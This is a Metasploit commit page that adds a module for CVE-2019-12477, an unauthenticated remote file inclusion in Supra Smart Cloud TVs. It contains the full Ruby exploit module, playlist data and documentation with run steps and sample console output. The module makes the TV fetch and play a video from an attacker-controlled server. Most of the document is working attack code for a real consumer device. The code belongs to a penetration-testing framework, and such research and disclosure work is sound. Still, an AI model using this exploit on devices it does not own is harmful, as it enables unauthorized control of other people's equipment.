Land #11952, Supra Smart Cloud TV RFI module

rapid7 · Jun 28, 2019 · 49176a3 · 49176a3
2 parents 354da81 + baa1729
commit 49176a3
Show file tree

Hide file tree

Showing 8 changed files with 134 additions and 0 deletions.
diff --git a/data/exploits/CVE-2019-12477/epicsax.m3u8 b/data/exploits/CVE-2019-12477/epicsax.m3u8
@@ -0,0 +1,15 @@
+#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-TARGETDURATION:4
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:3.433333,
+epicsax0.ts
+#EXTINF:1.700000,
+epicsax1.ts
+#EXTINF:1.700000,
+epicsax2.ts
+#EXTINF:1.700000,
+epicsax3.ts
+#EXTINF:1.466667,
+epicsax4.ts
+#EXT-X-ENDLIST
diff --git a/data/exploits/CVE-2019-12477/epicsax0.ts b/data/exploits/CVE-2019-12477/epicsax0.ts
diff --git a/data/exploits/CVE-2019-12477/epicsax1.ts b/data/exploits/CVE-2019-12477/epicsax1.ts
diff --git a/data/exploits/CVE-2019-12477/epicsax2.ts b/data/exploits/CVE-2019-12477/epicsax2.ts
diff --git a/data/exploits/CVE-2019-12477/epicsax3.ts b/data/exploits/CVE-2019-12477/epicsax3.ts
diff --git a/data/exploits/CVE-2019-12477/epicsax4.ts b/data/exploits/CVE-2019-12477/epicsax4.ts
diff --git a/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md b/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md
@@ -0,0 +1,35 @@
+## Summary
+
+This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV. 
+The media control for the device doesn't have any session management or authentication. Leveraging this, an
+attacker on the local network can send a crafted request to broadcast a fake video.
+
+**Reference:** https://www.inputzero.io/2019/06/hacking-smart-tv.html
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/supra_smart_cloud_tv_rfi `
+2. `set RHOSTS [IP]`
+3. `set SRVHOST [IP]`
+4. `run`
+
+Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system.
+
+## Sample Output
+
+```
+msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
+SRVHOST => 192.168.1.132
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
+RHOSTS => 192.168.1.155
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
+[*] Running module against 192.168.1.155
+[*] Using URL: http://192.168.1.132:8080/
+[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
+[+] Doo-doodoodoodoodoo-doo
+[*] Sleeping for 10s serving .m3u8 and .ts files...
+[*] Server stopped.
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) >
+```
diff --git a/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb b/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Supra Smart Cloud TV Remote File Inclusion',
+      'Description'    => %q{
+        This module exploits an unauthenticated remote file inclusion which
+        exists in Supra Smart Cloud TV. The media control for the device doesn't
+        have any session management or authentication. Leveraging this, an
+        attacker on the local network can send a crafted request to broadcast a
+        fake video.
+      },
+      'Author'         => [
+        'Dhiraj Mishra', # Discovery, PoC, and module
+        'wvu'            # Module
+      ],
+      'References'     => [
+        ['CVE', '2019-12477'],
+        ['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html']
+      ],
+      'DisclosureDate' => '2019-06-03',
+      'License'        => MSF_LICENSE
+    ))
+
+    deregister_options('URIPATH')
+  end
+
+  def run
+    start_service('Path' => '/')
+
+    print_status("Broadcasting Epic Sax Guy to #{peer}")
+    res = send_request_cgi(
+      'method'        => 'GET',
+      'uri'           => '/remote/media_control',
+      'encode_params' => false,
+      'vars_get'      => {
+        'action'      => 'setUri',
+        'uri'         => get_uri + 'epicsax.m3u8'
+      }
+    )
+
+    unless res && res.code == 200 && res.body.include?('OK')
+      print_error('No doo-doodoodoodoodoo-doo for you')
+      return
+    end
+
+    # Sleep time calibrated using successful pcap
+    print_good('Doo-doodoodoodoodoo-doo')
+    print_status('Sleeping for 10s serving .m3u8 and .ts files...')
+    sleep(10)
+  end
+
+  def on_request_uri(cli, request)
+    dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477')
+
+    files = {
+      '/epicsax.m3u8' => 'application/x-mpegURL',
+      '/epicsax0.ts'  => 'video/MP2T',
+      '/epicsax1.ts'  => 'video/MP2T',
+      '/epicsax2.ts'  => 'video/MP2T',
+      '/epicsax3.ts'  => 'video/MP2T',
+      '/epicsax4.ts'  => 'video/MP2T'
+    }
+
+    file = request.uri
+
+    unless files.include?(file)
+      vprint_error("Sending 404 for #{file}")
+      return send_not_found(cli)
+    end
+
+    data = File.read(File.join(dir, file))
+
+    vprint_good("Sending #{file}")
+    send_response(cli, data, 'Content-Type' => files[file])
+  end
+end